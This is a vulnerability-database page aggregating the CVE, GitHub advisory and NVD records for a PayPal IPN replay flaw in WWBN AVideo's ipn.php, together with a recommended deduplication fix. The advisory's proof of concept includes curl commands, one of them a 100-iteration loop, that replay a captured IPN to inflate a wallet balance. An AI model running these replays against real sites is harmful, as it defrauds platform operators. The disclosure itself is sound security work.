Vulnerability-Lookup

CVE-2026-39366 (GCVE-0-2026-39366)

Vulnerability from cvelistv5 – Published: 2026-04-07 19:21 – Updated: 2026-04-08 19:23

Title

WWBN AVideo Affected by a PayPal IPN Replay Attack Enabling Wallet Balance Inflation via Missing Transaction Deduplication in ipn.php

Summary

WWBN AVideo is an open source video platform. In versions 26.0 and prior, the PayPal IPN v1 handler at plugin/PayPalYPT/ipn.php lacks transaction deduplication, allowing an attacker to replay a single legitimate IPN notification to repeatedly inflate their wallet balance and renew subscriptions. The newer ipnV2.php and webhook.php handlers correctly deduplicate via PayPalYPT_log entries, but the v1 handler was never updated and remains actively referenced as the notify_url for billing plans.

Severity ?

6.5 (Medium)


                        
                          CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N

CWE

CWE-345 - Insufficient Verification of Data Authenticity

Assigner

GitHub_M

References

URL

Tags

	https://github.com/WWBN/AVideo/security/advisorie…	x_refsource_CONFIRM
	https://github.com/WWBN/AVideo/commit/8f53e9d9c6a…	x_refsource_MISC

Impacted products

	Vendor	Product	Version
	WWBN	AVideo	Affected: <= 26.0

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2026-39366",
                "options": [
                  {
                    "Exploitation": "poc"
                  },
                  {
                    "Automatable": "no"
                  },
                  {
                    "Technical Impact": "partial"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2026-04-08T19:20:45.647672Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2026-04-08T19:23:04.265Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "references": [
          {
            "tags": [
              "exploit"
            ],
            "url": "https://github.com/WWBN/AVideo/security/advisories/GHSA-mmw7-wq3c-wf9p"
          }
        ],
        "title": "CISA ADP Vulnrichment"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "AVideo",
          "vendor": "WWBN",
          "versions": [
            {
              "status": "affected",
              "version": "\u003c= 26.0"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "WWBN AVideo is an open source video platform. In versions 26.0 and prior, the PayPal IPN v1 handler at plugin/PayPalYPT/ipn.php lacks transaction deduplication, allowing an attacker to replay a single legitimate IPN notification to repeatedly inflate their wallet balance and renew subscriptions. The newer ipnV2.php and webhook.php handlers correctly deduplicate via PayPalYPT_log entries, but the v1 handler was never updated and remains actively referenced as the notify_url for billing plans."
        }
      ],
      "metrics": [
        {
          "cvssV3_1": {
            "attackComplexity": "LOW",
            "attackVector": "NETWORK",
            "availabilityImpact": "NONE",
            "baseScore": 6.5,
            "baseSeverity": "MEDIUM",
            "confidentialityImpact": "NONE",
            "integrityImpact": "HIGH",
            "privilegesRequired": "LOW",
            "scope": "UNCHANGED",
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N",
            "version": "3.1"
          }
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "cweId": "CWE-345",
              "description": "CWE-345: Insufficient Verification of Data Authenticity",
              "lang": "en",
              "type": "CWE"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2026-04-07T19:21:12.156Z",
        "orgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
        "shortName": "GitHub_M"
      },
      "references": [
        {
          "name": "https://github.com/WWBN/AVideo/security/advisories/GHSA-mmw7-wq3c-wf9p",
          "tags": [
            "x_refsource_CONFIRM"
          ],
          "url": "https://github.com/WWBN/AVideo/security/advisories/GHSA-mmw7-wq3c-wf9p"
        },
        {
          "name": "https://github.com/WWBN/AVideo/commit/8f53e9d9c6aaa07d51ace30691981edbbfb5ca1c",
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "https://github.com/WWBN/AVideo/commit/8f53e9d9c6aaa07d51ace30691981edbbfb5ca1c"
        }
      ],
      "source": {
        "advisory": "GHSA-mmw7-wq3c-wf9p",
        "discovery": "UNKNOWN"
      },
      "title": "WWBN AVideo Affected by a PayPal IPN Replay Attack Enabling Wallet Balance Inflation via Missing Transaction Deduplication in ipn.php"
    }
  },
  "cveMetadata": {
    "assignerOrgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
    "assignerShortName": "GitHub_M",
    "cveId": "CVE-2026-39366",
    "datePublished": "2026-04-07T19:21:12.156Z",
    "dateReserved": "2026-04-06T21:29:17.350Z",
    "dateUpdated": "2026-04-08T19:23:04.265Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.2",
  "vulnerability-lookup:meta": {
    "nvd": "{\"cve\":{\"id\":\"CVE-2026-39366\",\"sourceIdentifier\":\"security-advisories@github.com\",\"published\":\"2026-04-07T20:16:30.510\",\"lastModified\":\"2026-04-08T21:27:00.663\",\"vulnStatus\":\"Undergoing Analysis\",\"cveTags\":[],\"descriptions\":[{\"lang\":\"en\",\"value\":\"WWBN AVideo is an open source video platform. In versions 26.0 and prior, the PayPal IPN v1 handler at plugin/PayPalYPT/ipn.php lacks transaction deduplication, allowing an attacker to replay a single legitimate IPN notification to repeatedly inflate their wallet balance and renew subscriptions. The newer ipnV2.php and webhook.php handlers correctly deduplicate via PayPalYPT_log entries, but the v1 handler was never updated and remains actively referenced as the notify_url for billing plans.\"}],\"metrics\":{\"cvssMetricV31\":[{\"source\":\"security-advisories@github.com\",\"type\":\"Secondary\",\"cvssData\":{\"version\":\"3.1\",\"vectorString\":\"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N\",\"baseScore\":6.5,\"baseSeverity\":\"MEDIUM\",\"attackVector\":\"NETWORK\",\"attackComplexity\":\"LOW\",\"privilegesRequired\":\"LOW\",\"userInteraction\":\"NONE\",\"scope\":\"UNCHANGED\",\"confidentialityImpact\":\"NONE\",\"integrityImpact\":\"HIGH\",\"availabilityImpact\":\"NONE\"},\"exploitabilityScore\":2.8,\"impactScore\":3.6}]},\"weaknesses\":[{\"source\":\"security-advisories@github.com\",\"type\":\"Secondary\",\"description\":[{\"lang\":\"en\",\"value\":\"CWE-345\"}]}],\"references\":[{\"url\":\"https://github.com/WWBN/AVideo/commit/8f53e9d9c6aaa07d51ace30691981edbbfb5ca1c\",\"source\":\"security-advisories@github.com\"},{\"url\":\"https://github.com/WWBN/AVideo/security/advisories/GHSA-mmw7-wq3c-wf9p\",\"source\":\"security-advisories@github.com\"},{\"url\":\"https://github.com/WWBN/AVideo/security/advisories/GHSA-mmw7-wq3c-wf9p\",\"source\":\"134c704f-9b21-4f2e-91b3-4a467353bcc0\"}]}}",
    "vulnrichment": {
      "containers": "{\"adp\": [{\"title\": \"CISA ADP Vulnrichment\", \"metrics\": [{\"other\": {\"type\": \"ssvc\", \"content\": {\"id\": \"CVE-2026-39366\", \"role\": \"CISA Coordinator\", \"options\": [{\"Exploitation\": \"poc\"}, {\"Automatable\": \"no\"}, {\"Technical Impact\": \"partial\"}], \"version\": \"2.0.3\", \"timestamp\": \"2026-04-08T19:20:45.647672Z\"}}}], \"references\": [{\"url\": \"https://github.com/WWBN/AVideo/security/advisories/GHSA-mmw7-wq3c-wf9p\", \"tags\": [\"exploit\"]}], \"providerMetadata\": {\"orgId\": \"134c704f-9b21-4f2e-91b3-4a467353bcc0\", \"shortName\": \"CISA-ADP\", \"dateUpdated\": \"2026-04-08T19:20:55.351Z\"}}], \"cna\": {\"title\": \"WWBN AVideo Affected by a PayPal IPN Replay Attack Enabling Wallet Balance Inflation via Missing Transaction Deduplication in ipn.php\", \"source\": {\"advisory\": \"GHSA-mmw7-wq3c-wf9p\", \"discovery\": \"UNKNOWN\"}, \"metrics\": [{\"cvssV3_1\": {\"scope\": \"UNCHANGED\", \"version\": \"3.1\", \"baseScore\": 6.5, \"attackVector\": \"NETWORK\", \"baseSeverity\": \"MEDIUM\", \"vectorString\": \"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N\", \"integrityImpact\": \"HIGH\", \"userInteraction\": \"NONE\", \"attackComplexity\": \"LOW\", \"availabilityImpact\": \"NONE\", \"privilegesRequired\": \"LOW\", \"confidentialityImpact\": \"NONE\"}}], \"affected\": [{\"vendor\": \"WWBN\", \"product\": \"AVideo\", \"versions\": [{\"status\": \"affected\", \"version\": \"\u003c= 26.0\"}]}], \"references\": [{\"url\": \"https://github.com/WWBN/AVideo/security/advisories/GHSA-mmw7-wq3c-wf9p\", \"name\": \"https://github.com/WWBN/AVideo/security/advisories/GHSA-mmw7-wq3c-wf9p\", \"tags\": [\"x_refsource_CONFIRM\"]}, {\"url\": \"https://github.com/WWBN/AVideo/commit/8f53e9d9c6aaa07d51ace30691981edbbfb5ca1c\", \"name\": \"https://github.com/WWBN/AVideo/commit/8f53e9d9c6aaa07d51ace30691981edbbfb5ca1c\", \"tags\": [\"x_refsource_MISC\"]}], \"descriptions\": [{\"lang\": \"en\", \"value\": \"WWBN AVideo is an open source video platform. In versions 26.0 and prior, the PayPal IPN v1 handler at plugin/PayPalYPT/ipn.php lacks transaction deduplication, allowing an attacker to replay a single legitimate IPN notification to repeatedly inflate their wallet balance and renew subscriptions. The newer ipnV2.php and webhook.php handlers correctly deduplicate via PayPalYPT_log entries, but the v1 handler was never updated and remains actively referenced as the notify_url for billing plans.\"}], \"problemTypes\": [{\"descriptions\": [{\"lang\": \"en\", \"type\": \"CWE\", \"cweId\": \"CWE-345\", \"description\": \"CWE-345: Insufficient Verification of Data Authenticity\"}]}], \"providerMetadata\": {\"orgId\": \"a0819718-46f1-4df5-94e2-005712e83aaa\", \"shortName\": \"GitHub_M\", \"dateUpdated\": \"2026-04-07T19:21:12.156Z\"}}}",
      "cveMetadata": "{\"cveId\": \"CVE-2026-39366\", \"state\": \"PUBLISHED\", \"dateUpdated\": \"2026-04-08T19:23:04.265Z\", \"dateReserved\": \"2026-04-06T21:29:17.350Z\", \"assignerOrgId\": \"a0819718-46f1-4df5-94e2-005712e83aaa\", \"datePublished\": \"2026-04-07T19:21:12.156Z\", \"assignerShortName\": \"GitHub_M\"}",
      "dataType": "CVE_RECORD",
      "dataVersion": "5.2"
    }
  }
}

GHSA-MMW7-WQ3C-WF9P

Vulnerability from github – Published: 2026-04-08 00:08 – Updated: 2026-04-08 00:08

Summary

WWBN AVideo Affected by a PayPal IPN Replay Attack Enabling Wallet Balance Inflation via Missing Transaction Deduplication in ipn.php

Details

Summary

The PayPal IPN v1 handler at plugin/PayPalYPT/ipn.php lacks transaction deduplication, allowing an attacker to replay a single legitimate IPN notification to repeatedly inflate their wallet balance and renew subscriptions. The newer ipnV2.php and webhook.php handlers correctly deduplicate via PayPalYPT_log entries, but the v1 handler was never updated and remains actively referenced as the notify_url for billing plans.

Details

When a recurring payment IPN arrives at ipn.php, the handler:

Verifies authenticity via PayPalYPT::IPNcheck() (line 16), which sends the POST data to PayPal's cmd=_notify-validate endpoint. PayPal confirms the data is genuine but this verification is stateless — PayPal returns VERIFIED for the same authentic data on every submission.
Looks up the subscription from recurring_payment_id and directly credits the user's wallet (lines 41-53):

// plugin/PayPalYPT/ipn.php lines 41-53
$row = Subscription::getFromAgreement($_POST["recurring_payment_id"]);
$users_id = $row['users_id'];
$payment_amount = empty($_POST['mc_gross']) ? $_POST['amount'] : $_POST['mc_gross'];
$payment_currency = empty($_POST['mc_currency']) ? $_POST['currency_code'] : $_POST['mc_currency'];
if ($walletObject->currency===$payment_currency) {
    $plugin->addBalance($users_id, $payment_amount, "Paypal recurrent", json_encode($_POST));
    Subscription::renew($users_id, $row['subscriptions_plans_id']);
    $obj->error = false;
}

No txn_id uniqueness check. No PayPalYPT_log entry created. No deduplication of any kind.

Compare with the patched handlers: - ipnV2.php (line 50): PayPalYPT::isTokenUsed($_GET['token']) and (line 93): PayPalYPT::isRecurringPaymentIdUsed($_POST["verify_sign"]), with PayPalYPT_log entries saved on success. - webhook.php (line 30): PayPalYPT::isTokenUsed($token) with PayPalYPT_log entry saved on success.

The v1 ipn.php is still actively configured as notify_url in PayPalYPT.php at lines 85, 193, and 308:

$notify_url = "{$global['webSiteRootURL']}plugin/PayPalYPT/ipn.php";

PoC

# Prerequisites: A registered AVideo account with at least one completed PayPal subscription.

# Step 1: Complete a legitimate PayPal subscription.
# This generates an IPN notification to ipn.php containing your recurring_payment_id.

# Step 2: Capture the IPN POST body. This is available from:
# - PayPal's IPN History (paypal.com > Settings > IPN History)
# - Network interception during the initial subscription flow

# Step 3: Replay the captured IPN to inflate wallet balance.
# Each replay adds the subscription amount to the attacker's wallet.

# Single replay:
curl -X POST 'https://target.com/plugin/PayPalYPT/ipn.php' \
  -d 'recurring_payment_id=I-XXXXXXXXXX&mc_gross=9.99&mc_currency=USD&payment_status=Completed&txn_type=recurring_payment&verify_sign=REAL_VERIFY_SIGN&payer_email=attacker@example.com'

# Bulk replay (100x = 100x the subscription amount added to wallet):
for i in $(seq 1 100); do
  curl -s -X POST 'https://target.com/plugin/PayPalYPT/ipn.php' \
    -d 'recurring_payment_id=I-XXXXXXXXXX&mc_gross=9.99&mc_currency=USD&payment_status=Completed&txn_type=recurring_payment&verify_sign=REAL_VERIFY_SIGN&payer_email=attacker@example.com'
done

# Each request passes IPNcheck() (PayPal confirms the data is authentic),
# then addBalance() credits the wallet and Subscription::renew() extends the subscription.

Impact

Unlimited wallet balance inflation: An attacker can replay a single legitimate IPN to add arbitrary multiples of the subscription amount to their wallet balance, enabling free access to all paid content.
Unlimited subscription renewals: Each replay also calls Subscription::renew(), indefinitely extending subscription access from a single payment.
Financial loss: Platform operators lose revenue as attackers obtain paid services without corresponding payments.

Recommended Fix

Add deduplication to ipn.php consistent with the approach already used in ipnV2.php and webhook.php. Record each processed transaction in PayPalYPT_log and check before processing:

// plugin/PayPalYPT/ipn.php — replace lines 41-57 with:
} else {
    _error_log("PayPalIPN: recurring_payment_id = {$_POST["recurring_payment_id"]} ");

    // Deduplication: check if this IPN was already processed
    $dedup_key = !empty($_POST['txn_id']) ? $_POST['txn_id'] : $_POST['verify_sign'];
    if (PayPalYPT::isRecurringPaymentIdUsed($dedup_key)) {
        _error_log("PayPalIPN: already processed, skipping");
        die(json_encode($obj));
    }

    $subscription = AVideoPlugin::loadPluginIfEnabled("Subscription");
    if (!empty($subscription)) {
        $row = Subscription::getFromAgreement($_POST["recurring_payment_id"]);
        _error_log("PayPalIPN: user found from recurring_payment_id (users_id = {$row['users_id']}) ");
        $users_id = $row['users_id'];
        $payment_amount = empty($_POST['mc_gross']) ? $_POST['amount'] : $_POST['mc_gross'];
        $payment_currency = empty($_POST['mc_currency']) ? $_POST['currency_code'] : $_POST['mc_currency'];
        if ($walletObject->currency===$payment_currency) {
            // Log the transaction for deduplication
            $pp = new PayPalYPT_log(0);
            $pp->setUsers_id($users_id);
            $pp->setRecurring_payment_id($dedup_key);
            $pp->setValue($payment_amount);
            $pp->setJson(['post' => $_POST]);
            if ($pp->save()) {
                $plugin->addBalance($users_id, $payment_amount, "Paypal recurrent", json_encode($_POST));
                Subscription::renew($users_id, $row['subscriptions_plans_id']);
                $obj->error = false;
            }
        } else {
            _error_log("PayPalIPN: FAIL currency check $walletObject->currency===$payment_currency ");
        }
    }
}

Additionally, consider migrating the notify_url references in PayPalYPT.php (lines 85, 193, 308) from ipn.php to ipnV2.php or webhook.php, and eventually deprecating the v1 IPN handler entirely.

Severity ?

6.5 (Medium)


                  
                    CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N

Show details on source website

JSON

To clipboard

{
  "affected": [
    {
      "package": {
        "ecosystem": "Packagist",
        "name": "wwbn/avideo"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "last_affected": "26.0"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2026-39366"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-345"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-04-08T00:08:33Z",
    "nvd_published_at": "2026-04-07T20:16:30Z",
    "severity": "MODERATE"
  },
  "details": "## Summary\n\nThe PayPal IPN v1 handler at `plugin/PayPalYPT/ipn.php` lacks transaction deduplication, allowing an attacker to replay a single legitimate IPN notification to repeatedly inflate their wallet balance and renew subscriptions. The newer `ipnV2.php` and `webhook.php` handlers correctly deduplicate via `PayPalYPT_log` entries, but the v1 handler was never updated and remains actively referenced as the `notify_url` for billing plans.\n\n## Details\n\nWhen a recurring payment IPN arrives at `ipn.php`, the handler:\n\n1. Verifies authenticity via `PayPalYPT::IPNcheck()` (line 16), which sends the POST data to PayPal\u0027s `cmd=_notify-validate` endpoint. PayPal confirms the data is genuine but this verification is **stateless** \u2014 PayPal returns `VERIFIED` for the same authentic data on every submission.\n\n2. Looks up the subscription from `recurring_payment_id` and directly credits the user\u0027s wallet (lines 41-53):\n\n```php\n// plugin/PayPalYPT/ipn.php lines 41-53\n$row = Subscription::getFromAgreement($_POST[\"recurring_payment_id\"]);\n$users_id = $row[\u0027users_id\u0027];\n$payment_amount = empty($_POST[\u0027mc_gross\u0027]) ? $_POST[\u0027amount\u0027] : $_POST[\u0027mc_gross\u0027];\n$payment_currency = empty($_POST[\u0027mc_currency\u0027]) ? $_POST[\u0027currency_code\u0027] : $_POST[\u0027mc_currency\u0027];\nif ($walletObject-\u003ecurrency===$payment_currency) {\n    $plugin-\u003eaddBalance($users_id, $payment_amount, \"Paypal recurrent\", json_encode($_POST));\n    Subscription::renew($users_id, $row[\u0027subscriptions_plans_id\u0027]);\n    $obj-\u003eerror = false;\n}\n```\n\nNo `txn_id` uniqueness check. No `PayPalYPT_log` entry created. No deduplication of any kind.\n\nCompare with the patched handlers:\n- **`ipnV2.php`** (line 50): `PayPalYPT::isTokenUsed($_GET[\u0027token\u0027])` and (line 93): `PayPalYPT::isRecurringPaymentIdUsed($_POST[\"verify_sign\"])`, with `PayPalYPT_log` entries saved on success.\n- **`webhook.php`** (line 30): `PayPalYPT::isTokenUsed($token)` with `PayPalYPT_log` entry saved on success.\n\nThe v1 `ipn.php` is still actively configured as `notify_url` in `PayPalYPT.php` at lines 85, 193, and 308:\n```php\n$notify_url = \"{$global[\u0027webSiteRootURL\u0027]}plugin/PayPalYPT/ipn.php\";\n```\n\n## PoC\n\n```bash\n# Prerequisites: A registered AVideo account with at least one completed PayPal subscription.\n\n# Step 1: Complete a legitimate PayPal subscription.\n# This generates an IPN notification to ipn.php containing your recurring_payment_id.\n\n# Step 2: Capture the IPN POST body. This is available from:\n# - PayPal\u0027s IPN History (paypal.com \u003e Settings \u003e IPN History)\n# - Network interception during the initial subscription flow\n\n# Step 3: Replay the captured IPN to inflate wallet balance.\n# Each replay adds the subscription amount to the attacker\u0027s wallet.\n\n# Single replay:\ncurl -X POST \u0027https://target.com/plugin/PayPalYPT/ipn.php\u0027 \\\n  -d \u0027recurring_payment_id=I-XXXXXXXXXX\u0026mc_gross=9.99\u0026mc_currency=USD\u0026payment_status=Completed\u0026txn_type=recurring_payment\u0026verify_sign=REAL_VERIFY_SIGN\u0026payer_email=attacker@example.com\u0027\n\n# Bulk replay (100x = 100x the subscription amount added to wallet):\nfor i in $(seq 1 100); do\n  curl -s -X POST \u0027https://target.com/plugin/PayPalYPT/ipn.php\u0027 \\\n    -d \u0027recurring_payment_id=I-XXXXXXXXXX\u0026mc_gross=9.99\u0026mc_currency=USD\u0026payment_status=Completed\u0026txn_type=recurring_payment\u0026verify_sign=REAL_VERIFY_SIGN\u0026payer_email=attacker@example.com\u0027\ndone\n\n# Each request passes IPNcheck() (PayPal confirms the data is authentic),\n# then addBalance() credits the wallet and Subscription::renew() extends the subscription.\n```\n\n## Impact\n\n- **Unlimited wallet balance inflation**: An attacker can replay a single legitimate IPN to add arbitrary multiples of the subscription amount to their wallet balance, enabling free access to all paid content.\n- **Unlimited subscription renewals**: Each replay also calls `Subscription::renew()`, indefinitely extending subscription access from a single payment.\n- **Financial loss**: Platform operators lose revenue as attackers obtain paid services without corresponding payments.\n\n## Recommended Fix\n\nAdd deduplication to `ipn.php` consistent with the approach already used in `ipnV2.php` and `webhook.php`. Record each processed transaction in `PayPalYPT_log` and check before processing:\n\n```php\n// plugin/PayPalYPT/ipn.php \u2014 replace lines 41-57 with:\n} else {\n    _error_log(\"PayPalIPN: recurring_payment_id = {$_POST[\"recurring_payment_id\"]} \");\n\n    // Deduplication: check if this IPN was already processed\n    $dedup_key = !empty($_POST[\u0027txn_id\u0027]) ? $_POST[\u0027txn_id\u0027] : $_POST[\u0027verify_sign\u0027];\n    if (PayPalYPT::isRecurringPaymentIdUsed($dedup_key)) {\n        _error_log(\"PayPalIPN: already processed, skipping\");\n        die(json_encode($obj));\n    }\n\n    $subscription = AVideoPlugin::loadPluginIfEnabled(\"Subscription\");\n    if (!empty($subscription)) {\n        $row = Subscription::getFromAgreement($_POST[\"recurring_payment_id\"]);\n        _error_log(\"PayPalIPN: user found from recurring_payment_id (users_id = {$row[\u0027users_id\u0027]}) \");\n        $users_id = $row[\u0027users_id\u0027];\n        $payment_amount = empty($_POST[\u0027mc_gross\u0027]) ? $_POST[\u0027amount\u0027] : $_POST[\u0027mc_gross\u0027];\n        $payment_currency = empty($_POST[\u0027mc_currency\u0027]) ? $_POST[\u0027currency_code\u0027] : $_POST[\u0027mc_currency\u0027];\n        if ($walletObject-\u003ecurrency===$payment_currency) {\n            // Log the transaction for deduplication\n            $pp = new PayPalYPT_log(0);\n            $pp-\u003esetUsers_id($users_id);\n            $pp-\u003esetRecurring_payment_id($dedup_key);\n            $pp-\u003esetValue($payment_amount);\n            $pp-\u003esetJson([\u0027post\u0027 =\u003e $_POST]);\n            if ($pp-\u003esave()) {\n                $plugin-\u003eaddBalance($users_id, $payment_amount, \"Paypal recurrent\", json_encode($_POST));\n                Subscription::renew($users_id, $row[\u0027subscriptions_plans_id\u0027]);\n                $obj-\u003eerror = false;\n            }\n        } else {\n            _error_log(\"PayPalIPN: FAIL currency check $walletObject-\u003ecurrency===$payment_currency \");\n        }\n    }\n}\n```\n\nAdditionally, consider migrating the `notify_url` references in `PayPalYPT.php` (lines 85, 193, 308) from `ipn.php` to `ipnV2.php` or `webhook.php`, and eventually deprecating the v1 IPN handler entirely.",
  "id": "GHSA-mmw7-wq3c-wf9p",
  "modified": "2026-04-08T00:08:33Z",
  "published": "2026-04-08T00:08:33Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/WWBN/AVideo/security/advisories/GHSA-mmw7-wq3c-wf9p"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-39366"
    },
    {
      "type": "WEB",
      "url": "https://github.com/WWBN/AVideo/commit/8f53e9d9c6aaa07d51ace30691981edbbfb5ca1c"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/WWBN/AVideo"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N",
      "type": "CVSS_V3"
    }
  ],
  "summary": "WWBN AVideo Affected by a PayPal IPN Replay Attack Enabling Wallet Balance Inflation via Missing Transaction Deduplication in ipn.php"
}

FKIE_CVE-2026-39366

Vulnerability from fkie_nvd - Published: 2026-04-07 20:16 - Updated: 2026-04-08 21:27

Severity ?

6.5 (Medium) - CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N

Summary

References

	URL	Tags
	security-advisories@github.com	https://github.com/WWBN/AVideo/commit/8f53e9d9c6aaa07d51ace30691981edbbfb5ca1c
	security-advisories@github.com	https://github.com/WWBN/AVideo/security/advisories/GHSA-mmw7-wq3c-wf9p
	134c704f-9b21-4f2e-91b3-4a467353bcc0	https://github.com/WWBN/AVideo/security/advisories/GHSA-mmw7-wq3c-wf9p

Impacted products

	Vendor	Product	Version

JSON

To clipboard

{
  "cveTags": [],
  "descriptions": [
    {
      "lang": "en",
      "value": "WWBN AVideo is an open source video platform. In versions 26.0 and prior, the PayPal IPN v1 handler at plugin/PayPalYPT/ipn.php lacks transaction deduplication, allowing an attacker to replay a single legitimate IPN notification to repeatedly inflate their wallet balance and renew subscriptions. The newer ipnV2.php and webhook.php handlers correctly deduplicate via PayPalYPT_log entries, but the v1 handler was never updated and remains actively referenced as the notify_url for billing plans."
    }
  ],
  "id": "CVE-2026-39366",
  "lastModified": "2026-04-08T21:27:00.663",
  "metrics": {
    "cvssMetricV31": [
      {
        "cvssData": {
          "attackComplexity": "LOW",
          "attackVector": "NETWORK",
          "availabilityImpact": "NONE",
          "baseScore": 6.5,
          "baseSeverity": "MEDIUM",
          "confidentialityImpact": "NONE",
          "integrityImpact": "HIGH",
          "privilegesRequired": "LOW",
          "scope": "UNCHANGED",
          "userInteraction": "NONE",
          "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N",
          "version": "3.1"
        },
        "exploitabilityScore": 2.8,
        "impactScore": 3.6,
        "source": "security-advisories@github.com",
        "type": "Secondary"
      }
    ]
  },
  "published": "2026-04-07T20:16:30.510",
  "references": [
    {
      "source": "security-advisories@github.com",
      "url": "https://github.com/WWBN/AVideo/commit/8f53e9d9c6aaa07d51ace30691981edbbfb5ca1c"
    },
    {
      "source": "security-advisories@github.com",
      "url": "https://github.com/WWBN/AVideo/security/advisories/GHSA-mmw7-wq3c-wf9p"
    },
    {
      "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
      "url": "https://github.com/WWBN/AVideo/security/advisories/GHSA-mmw7-wq3c-wf9p"
    }
  ],
  "sourceIdentifier": "security-advisories@github.com",
  "vulnStatus": "Awaiting Analysis",
  "weaknesses": [
    {
      "description": [
        {
          "lang": "en",
          "value": "CWE-345"
        }
      ],
      "source": "security-advisories@github.com",
      "type": "Secondary"
    }
  ]
}

Sightings

Author	Source	Type	Date

Nomenclature

Seen: The vulnerability was mentioned, discussed, or observed by the user.
Confirmed: The vulnerability has been validated from an analyst's perspective.
Published Proof of Concept: A public proof of concept is available for this vulnerability.
Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
Not confirmed: The user expressed doubt about the validity of the vulnerability.
Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.

Detection rules are retrieved from Rulezet.

Action not permitted

CVE-2026-39366 (GCVE-0-2026-39366)

GHSA-MMW7-WQ3C-WF9P

Summary

Details

PoC

Impact

Recommended Fix

FKIE_CVE-2026-39366

Tags

Sightings

Nomenclature